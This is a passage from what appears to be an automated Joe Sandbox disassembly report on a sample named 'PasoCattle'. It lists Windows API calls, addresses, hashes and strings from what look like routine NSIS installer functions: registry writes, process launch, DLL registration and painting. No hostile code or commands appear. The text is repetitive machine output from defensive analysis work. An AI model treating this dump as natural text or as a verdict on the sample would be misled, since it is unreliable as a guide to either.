                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                      • String ID: F
                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      Strings
                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                      Strings
                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                      Strings
                                                                                                                                                                      • `G, xrefs: 0040246E
                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                      • API String ID: 1033533793-4193110038
                                                                                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                      Strings
                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                      • String ID: f
                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                      • MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                      Strings
                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                      APIs
